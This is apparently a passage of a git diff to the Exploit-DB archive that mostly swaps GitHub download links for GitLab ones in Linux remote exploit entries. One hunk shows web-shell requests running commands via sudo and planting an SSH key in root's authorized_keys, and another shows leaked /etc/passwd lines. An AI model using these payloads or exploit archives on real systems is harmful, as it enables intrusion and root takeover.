+++ b/exploits/linux/remote/25006.txt @@ -4,4 +4,4 @@ It is reported that rtf2latex2e is susceptible to a stack buffer overflow vulner This vulnerability allows remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read the malicious RTF file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25006.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25006.zip \ No newline at end of file diff --git a/exploits/linux/remote/25008.txt b/exploits/linux/remote/25008.txt index d442db37f..67c4fe69a 100644 --- a/exploits/linux/remote/25008.txt +++ b/exploits/linux/remote/25008.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue by crafting a malicious message that contains LinPopUp version 1.2.0 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25008.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25008.zip \ No newline at end of file diff --git a/exploits/linux/remote/25010.txt b/exploits/linux/remote/25010.txt index e1a67ddb2..98d2fb72b 100644 --- a/exploits/linux/remote/25010.txt +++ b/exploits/linux/remote/25010.txt @@ -4,4 +4,4 @@ o3read is prone to a buffer overflow vulnerability. This issue is exposed when t Successful exploitation will result in code execution with the privileges of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25010.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25010.zip \ No newline at end of file diff --git a/exploits/linux/remote/25015.txt b/exploits/linux/remote/25015.txt index be5dd54a2..9b129f1d6 100644 --- a/exploits/linux/remote/25015.txt +++ b/exploits/linux/remote/25015.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through the application, the attack Ringtone Tools version 2.22 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25015.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25015.zip \ No newline at end of file diff --git a/exploits/linux/remote/25030.txt b/exploits/linux/remote/25030.txt index 5895a4135..18c530b73 100644 --- a/exploits/linux/remote/25030.txt +++ b/exploits/linux/remote/25030.txt @@ -4,4 +4,4 @@ GNU UnRTF is prone to a buffer overflow vulnerability. This issue is exposed whe Successful exploitation will result in execution of arbitrary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25030.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25030.zip \ No newline at end of file diff --git a/exploits/linux/remote/25035.txt b/exploits/linux/remote/25035.txt index 7184b72c5..1b683b980 100644 --- a/exploits/linux/remote/25035.txt +++ b/exploits/linux/remote/25035.txt @@ -4,4 +4,4 @@ PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the Successful exploitation of this issue will result in execution of arbitrary code as the user of the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25035.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25035.zip \ No newline at end of file diff --git a/exploits/linux/remote/25036.txt b/exploits/linux/remote/25036.txt index ac4931f11..f31dc55bc 100644 --- a/exploits/linux/remote/25036.txt +++ b/exploits/linux/remote/25036.txt @@ -4,4 +4,4 @@ PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the Successful exploitation of this issue will result in execution of arbitrary code as the user of the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25036.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25036.zip \ No newline at end of file diff --git a/exploits/linux/remote/25150.txt b/exploits/linux/remote/25150.txt index f22b2c1f1..4bac7e60e 100644 --- a/exploits/linux/remote/25150.txt +++ b/exploits/linux/remote/25150.txt @@ -4,4 +4,4 @@ A remotely exploitable client-side directory-traversal vulnerability affects Win An attacker may leverage this issue by distributing malicious ACE archives to unsuspecting users. This issue will allow an attacker to write files to arbitrary locations on the filesystem with the privileges of an unsuspecting user that extracts the malicious ACE archive. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25150.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25150.zip \ No newline at end of file diff --git a/exploits/linux/remote/26540.txt b/exploits/linux/remote/26540.txt index 1cb683ae0..d6ce4c7f0 100644 --- a/exploits/linux/remote/26540.txt +++ b/exploits/linux/remote/26540.txt @@ -4,4 +4,4 @@ Inkscape is prone to a buffer overflow vulnerability. This issue is due to a fai When the application processes a malformed SVG image file, it results in a buffer overflow. An attacker can exploit this vulnerability to execute arbitrary code in the context of the victim user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26540.svg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26540.svg \ No newline at end of file diff --git a/exploits/linux/remote/29160.c b/exploits/linux/remote/29160.c index 821b0fc69..8611f2d2f 100644 --- a/exploits/linux/remote/29160.c +++ b/exploits/linux/remote/29160.c @@ -102,4 +102,4 @@ int main(int argc, char *argv[]) sprintf(b.header.chksum, "%06o ", cksum); fwrite(&b, 1, sizeof(b), stdout); data(d, strlen(d)); -} +} \ No newline at end of file diff --git a/exploits/linux/remote/29471.txt b/exploits/linux/remote/29471.txt index d47f815aa..66afd0568 100644 --- a/exploits/linux/remote/29471.txt +++ b/exploits/linux/remote/29471.txt @@ -6,4 +6,4 @@ A remote attacker can exploit this issue to gain control of mouse and keyboard H Versions prior to 2.25 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29471.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29471.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/29768.txt b/exploits/linux/remote/29768.txt index 1f0d897e8..6ecee2d83 100644 --- a/exploits/linux/remote/29768.txt +++ b/exploits/linux/remote/29768.txt @@ -4,4 +4,4 @@ Mozilla Firefox is prone to vulnerability that may allow attackers to obtain pot A successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29768.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29768.zip \ No newline at end of file diff --git a/exploits/linux/remote/29769.txt b/exploits/linux/remote/29769.txt index 3da2414b6..a753d0e95 100644 --- a/exploits/linux/remote/29769.txt +++ b/exploits/linux/remote/29769.txt @@ -4,4 +4,4 @@ Opera is prone to vulnerability that may allow attackers to obtain potentially s A successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29769.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29769.zip \ No newline at end of file diff --git a/exploits/linux/remote/29770.txt b/exploits/linux/remote/29770.txt index 170489d6a..07fb4a717 100644 --- a/exploits/linux/remote/29770.txt +++ b/exploits/linux/remote/29770.txt @@ -4,4 +4,4 @@ KDE Konqueror is prone to a vulnerability that may allow attackers to obtain pot A successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29770.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29770.zip \ No newline at end of file diff --git a/exploits/linux/remote/30043.txt b/exploits/linux/remote/30043.txt index 53021c6c1..b8ccd9302 100644 --- a/exploits/linux/remote/30043.txt +++ b/exploits/linux/remote/30043.txt @@ -6,7 +6,7 @@ An attacker can exploit these issues to crash the affected application, effectiv Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30043.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30043.zip CVE: 2007-2788 & 2007-2789 OSVDB-ID: 36199 & 36200 \ No newline at end of file diff --git a/exploits/linux/remote/30089.txt b/exploits/linux/remote/30089.txt index 162568be8..a0ad46cd2 100644 --- a/exploits/linux/remote/30089.txt +++ b/exploits/linux/remote/30089.txt @@ -6,4 +6,4 @@ Attacker-supplied script code would run in the context of the affected site, pot This issue affects Ruby on Rails 1.2.3; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30089.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30089.tgz \ No newline at end of file diff --git a/exploits/linux/remote/30142.txt b/exploits/linux/remote/30142.txt index fe27f834a..147f902ec 100644 --- a/exploits/linux/remote/30142.txt +++ b/exploits/linux/remote/30142.txt @@ -4,4 +4,4 @@ GDB is prone to a buffer-overflow vulnerability because it fails to properly che Attackers could leverage this issue to run arbitrary code outside of a restricted environment, which may lead to privilege escalation. Symantec has not confirmed code execution. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30142.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30142.zip \ No newline at end of file diff --git a/exploits/linux/remote/3021.txt b/exploits/linux/remote/3021.txt index 1f87a4f5a..410eba4a5 100644 --- a/exploits/linux/remote/3021.txt +++ b/exploits/linux/remote/3021.txt @@ -2,6 +2,6 @@ # solareclipse at phreedom dot org # GPG key ID: E36B11B7 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz) # milw0rm.com [2003-10-15] \ No newline at end of file diff --git a/exploits/linux/remote/30291.txt b/exploits/linux/remote/30291.txt index 6d9ada7cb..48121a47a 100644 --- a/exploits/linux/remote/30291.txt +++ b/exploits/linux/remote/30291.txt @@ -11,4 +11,4 @@ ClamAV prior to 0.91 Other applications using the vulnerabile 'UnRAR' utility are affected by this issue. We will update this BID as more information emerges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30291.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30291.rar \ No newline at end of file diff --git a/exploits/linux/remote/30543.txt b/exploits/linux/remote/30543.txt index 450dc6772..0551273cc 100644 --- a/exploits/linux/remote/30543.txt +++ b/exploits/linux/remote/30543.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Doomsday Engine 1.90-beta5.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30543.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30543.zip \ No newline at end of file diff --git a/exploits/linux/remote/30728.txt b/exploits/linux/remote/30728.txt index 8058eb0a7..17e7b7aee 100644 --- a/exploits/linux/remote/30728.txt +++ b/exploits/linux/remote/30728.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to inject and execute arbitrary malicious Per Yarssr 0.2.2 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30728.rss \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30728.rss \ No newline at end of file diff --git a/exploits/linux/remote/30907.txt b/exploits/linux/remote/30907.txt index 09af8529c..b836cd02f 100644 --- a/exploits/linux/remote/30907.txt +++ b/exploits/linux/remote/30907.txt @@ -8,4 +8,4 @@ This issue affects Adobe Flash Player 9.0.48.0, 8.0.35.0, and prior versions. NOTE: This issue was previously disclosed in BID 26929 (Adobe Flash Player Multiple Security Vulnerabilities) but has been assigned its own BID because new technical details are available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30907.as \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30907.as \ No newline at end of file diff --git a/exploits/linux/remote/30971.txt b/exploits/linux/remote/30971.txt index 66ab050c7..4224ab54f 100644 --- a/exploits/linux/remote/30971.txt +++ b/exploits/linux/remote/30971.txt @@ -9,4 +9,4 @@ Successfully exploiting these issues allows remote attackers to execute arbitrar Georgia SoftWorks Secure Shell Server 7.01.0003 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30971.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30971.zip \ No newline at end of file diff --git a/exploits/linux/remote/31076.py b/exploits/linux/remote/31076.py index f6675c6ef..318d8ef84 100755 --- a/exploits/linux/remote/31076.py +++ b/exploits/linux/remote/31076.py @@ -54,5 +54,4 @@ except Exception, e: print "[+] Usage: python mplayer_poc.py filename.mov windows (For WinXP Prof SP2 ES)" print " python mplayer_poc.py filename.mov linux (For -Linux Gentoo)" - +Linux Gentoo)" \ No newline at end of file diff --git a/exploits/linux/remote/31591.txt b/exploits/linux/remote/31591.txt index ad0cc9839..0045ed278 100644 --- a/exploits/linux/remote/31591.txt +++ b/exploits/linux/remote/31591.txt @@ -6,4 +6,4 @@ Exploiting this issue allows an attacker to access arbitrary files outside of th LANDesk Management Suite 8.80.1.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31591.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31591.zip \ No newline at end of file diff --git a/exploits/linux/remote/31630.txt b/exploits/linux/remote/31630.txt index 3877ea59c..458cff65f 100644 --- a/exploits/linux/remote/31630.txt +++ b/exploits/linux/remote/31630.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code in the context of t Adobe Flash Player 9.0.115.0 and earlier versions are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31630.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31630.rar \ No newline at end of file diff --git a/exploits/linux/remote/32012.txt b/exploits/linux/remote/32012.txt index d412d0d25..caad39c1b 100644 --- a/exploits/linux/remote/32012.txt +++ b/exploits/linux/remote/32012.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues can allow an attacker to execute arbitrary Netrw 125 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32012.tar.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32012.tar.bz2 \ No newline at end of file diff --git a/exploits/linux/remote/32133.txt b/exploits/linux/remote/32133.txt index 466abadce..110ae75b0 100644 --- a/exploits/linux/remote/32133.txt +++ b/exploits/linux/remote/32133.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges This issue affects libxslt 1.1.8 to 1.1.24. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32133.xsl \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32133.xsl \ No newline at end of file diff --git a/exploits/linux/remote/32225.txt b/exploits/linux/remote/32225.txt index f4816e634..04f170cd1 100644 --- a/exploits/linux/remote/32225.txt +++ b/exploits/linux/remote/32225.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges This issue affects Vim 6.2.429 through 6.3.058. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32225.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32225.zip \ No newline at end of file diff --git a/exploits/linux/remote/32691.txt b/exploits/linux/remote/32691.txt index f5e309787..3aec2f15e 100644 --- a/exploits/linux/remote/32691.txt +++ b/exploits/linux/remote/32691.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary machine code in the cont This issue affects libaudiofile 0.2.6; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32691.wav \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32691.wav \ No newline at end of file diff --git a/exploits/linux/remote/32965.c b/exploits/linux/remote/32965.c index d50545a15..e3cf05a47 100644 --- a/exploits/linux/remote/32965.c +++ b/exploits/linux/remote/32965.c @@ -68,5 +68,4 @@ main (void) gnutls_global_deinit (); return 0; -} - +} \ No newline at end of file diff --git a/exploits/linux/remote/33032.txt b/exploits/linux/remote/33032.txt index ffce96a96..a384273ca 100644 --- a/exploits/linux/remote/33032.txt +++ b/exploits/linux/remote/33032.txt @@ -7,4 +7,4 @@ Successful exploits may allow remote attackers to execute arbitrary code or caus Versions prior to 'Compress::Raw::Zlib' 2.017 are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33032.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33032.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/33313.txt b/exploits/linux/remote/33313.txt index f7eac2eca..534b33c26 100644 --- a/exploits/linux/remote/33313.txt +++ b/exploits/linux/remote/33313.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code and to cause denial NOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities), but has been assigned its own record to better document it. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33313.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33313.tgz \ No newline at end of file diff --git a/exploits/linux/remote/34192.txt b/exploits/linux/remote/34192.txt index 30e86974f..b30818a40 100644 --- a/exploits/linux/remote/34192.txt +++ b/exploits/linux/remote/34192.txt @@ -13,4 +13,4 @@ SeaMonkey 2.0.5 NOTE: This issue was previously covered in BID 41050 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-26/27/28/29/30/32 Remote Vulnerabilities) but has been given its own record to better document it. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34192.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34192.zip \ No newline at end of file diff --git a/exploits/linux/remote/34358.txt b/exploits/linux/remote/34358.txt index e70d4e5c3..48eca1277 100644 --- a/exploits/linux/remote/34358.txt +++ b/exploits/linux/remote/34358.txt @@ -12,4 +12,4 @@ SeaMonkey 2.0.6 NOTE: This issue was previously covered in BID 41824 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-34 Through -47 Multiple Remote Vulnerabilities), but has been assigned its own record to better document it. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34358.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34358.zip \ No newline at end of file diff --git a/exploits/linux/remote/35232.txt b/exploits/linux/remote/35232.txt index 08bebb484..e92bdbd04 100644 --- a/exploits/linux/remote/35232.txt +++ b/exploits/linux/remote/35232.txt @@ -4,4 +4,4 @@ Pango is prone to a remote heap-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35232.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35232.zip \ No newline at end of file diff --git a/exploits/linux/remote/35314.txt b/exploits/linux/remote/35314.txt index fa47ef91b..0480376b3 100644 --- a/exploits/linux/remote/35314.txt +++ b/exploits/linux/remote/35314.txt @@ -4,4 +4,4 @@ Wireshark is prone to a memory-corruption vulnerability because it fails to prop Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35314.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35314.pcap \ No newline at end of file diff --git a/exploits/linux/remote/39736.txt b/exploits/linux/remote/39736.txt index b629e100e..4041e7813 100644 --- a/exploits/linux/remote/39736.txt +++ b/exploits/linux/remote/39736.txt @@ -230,7 +230,7 @@ Solution This bug has been fixed in git HEAD [4]. Full Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39736.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39736.zip Footnotes _________ diff --git a/exploits/linux/remote/40916.txt b/exploits/linux/remote/40916.txt index 0027618ec..788a7c182 100644 --- a/exploits/linux/remote/40916.txt +++ b/exploits/linux/remote/40916.txt @@ -181,4 +181,4 @@ package file, without some of the usual information.) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40916.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40916.zip \ No newline at end of file diff --git a/exploits/linux/remote/41910.sh b/exploits/linux/remote/41910.sh index 35deb2121..ddb3a615e 100755 --- a/exploits/linux/remote/41910.sh +++ b/exploits/linux/remote/41910.sh @@ -190,5 +190,4 @@ fi # Done -echo -e "\n[*] All done. Exiting" - +echo -e "\n[*] All done. Exiting" \ No newline at end of file diff --git a/exploits/linux/remote/42695.rb b/exploits/linux/remote/42695.rb index 0a4545392..ce370ca5b 100755 --- a/exploits/linux/remote/42695.rb +++ b/exploits/linux/remote/42695.rb @@ -116,4 +116,4 @@ sub get_file { } -} +} \ No newline at end of file diff --git a/exploits/linux/remote/42697.rb b/exploits/linux/remote/42697.rb index 2eabdc2f2..5ace9b632 100755 --- a/exploits/linux/remote/42697.rb +++ b/exploits/linux/remote/42697.rb @@ -233,5 +233,4 @@ sub get_license() { @out = ( '2', substr($error_msg, 12, -1)); # Remove 'X-AV-ERROR: 'and \n return \@out; } -} - +} \ No newline at end of file diff --git a/exploits/linux/remote/42709.rb b/exploits/linux/remote/42709.rb index 488b62ebe..828b5b3e3 100755 --- a/exploits/linux/remote/42709.rb +++ b/exploits/linux/remote/42709.rb @@ -167,5 +167,4 @@ sub get_log_line { push(@ret,"path not auth"); return \@ret; } -} - +} \ No newline at end of file diff --git a/exploits/linux/remote/42790.txt b/exploits/linux/remote/42790.txt index cc65f3807..b859595c0 100644 --- a/exploits/linux/remote/42790.txt +++ b/exploits/linux/remote/42790.txt @@ -30,4 +30,4 @@ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ----------------------snip--------------------------- +---------------------snip--------------------------- \ No newline at end of file diff --git a/exploits/linux/remote/42949.txt b/exploits/linux/remote/42949.txt index 81c1993cf..50cbad8fd 100644 --- a/exploits/linux/remote/42949.txt +++ b/exploits/linux/remote/42949.txt @@ -14,4 +14,4 @@ https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1 https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27 # Just push your ssh key and get nice root access (ssh is open by default even from wifi guest) -https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27 +https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27 \ No newline at end of file diff --git a/exploits/linux/remote/42957.py b/exploits/linux/remote/42957.py index fb79f1e9f..8fc76061f 100755 --- a/exploits/linux/remote/42957.py +++ b/exploits/linux/remote/42957.py @@ -163,4 +163,4 @@ s1.close() s2.close() # 3. Solution: -# Update to Unitrends UEB 10 +# Update to Unitrends UEB 10 \ No newline at end of file diff --git a/exploits/linux/remote/42958.py b/exploits/linux/remote/42958.py index 9b8d42e8f..92d825243 100755 --- a/exploits/linux/remote/42958.py +++ b/exploits/linux/remote/42958.py @@ -113,4 +113,4 @@ print r1.status, r1.reason print r1.read() # 3. Solution: -# Update to Unitrends UEB 10 +# Update to Unitrends UEB 10 \ No newline at end of file diff --git a/exploits/linux/remote/43360.py b/exploits/linux/remote/43360.py index 091638cfb..027c95b6c 100755 --- a/exploits/linux/remote/43360.py +++ b/exploits/linux/remote/43360.py @@ -2,7 +2,7 @@ # GoAhead httpd/2.5 to 3.6.5 LD_PRELOAD remote code execution exploit -# EDB Note: Payloads ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43360.zip +# EDB Note: Payloads ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43360.zip # EDB Note: Source ~ https://www.elttam.com.au/blog/goahead/ # EDB Note: Source ~ https://github.com/elttam/advisories/blob/c778394dfe454083ebdfb52f660fd3414ee8adb8/CVE-2017-17562/ diff --git a/exploits/linux/remote/46242.txt b/exploits/linux/remote/46242.txt index 87af8d69c..7026f9c0a 100644 --- a/exploits/linux/remote/46242.txt +++ b/exploits/linux/remote/46242.txt @@ -261,4 +261,4 @@ Just filing this enhancement request to think about this (or some other solution Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46242.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46242.zip \ No newline at end of file diff --git a/exploits/linux/remote/5386.txt b/exploits/linux/remote/5386.txt index b04595d98..4328d327e 100644 --- a/exploits/linux/remote/5386.txt +++ b/exploits/linux/remote/5386.txt @@ -52,6 +52,6 @@ ** */ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz) # milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/exploits/linux/remote/5622.txt b/exploits/linux/remote/5622.txt index dbb86f447..198d045eb 100644 --- a/exploits/linux/remote/5622.txt +++ b/exploits/linux/remote/5622.txt @@ -13,7 +13,7 @@ keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl ***E-DB Note: Mirror ~ https://github.com/g0tmi1k/debian-ssh*** 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) 2. Extract it to a directory diff --git a/exploits/linux/remote/5632.rb b/exploits/linux/remote/5632.rb index 3cb00c5fc..0da9e3c97 100755 --- a/exploits/linux/remote/5632.rb +++ b/exploits/linux/remote/5632.rb @@ -13,8 +13,8 @@ # # Common Keys: # -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2) -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) # # # Usage: diff --git a/exploits/linux/remote/5720.py b/exploits/linux/remote/5720.py index 31156e471..797de71b8 100755 --- a/exploits/linux/remote/5720.py +++ b/exploits/linux/remote/5720.py @@ -17,7 +17,7 @@ # Autor: hitz - WarCat team (warcat.no-ip.org) # Collaborator: pretoriano # -# 1. Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) +# 1. Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) # # 2. Extract it to a directory # diff --git a/exploits/linux/remote/609.txt b/exploits/linux/remote/609.txt index fdc0485d0..93c592e26 100644 --- a/exploits/linux/remote/609.txt +++ b/exploits/linux/remote/609.txt @@ -1,4 +1,4 @@ Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/609.tar.gz (ximage_zgv.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/609.tar.gz (ximage_zgv.tar.gz) # milw0rm.com [2004-10-28] \ No newline at end of file diff --git a/exploits/linux/remote/7701.txt b/exploits/linux/remote/7701.txt index a8ac65cb2..323a139f6 100644 --- a/exploits/linux/remote/7701.txt +++ 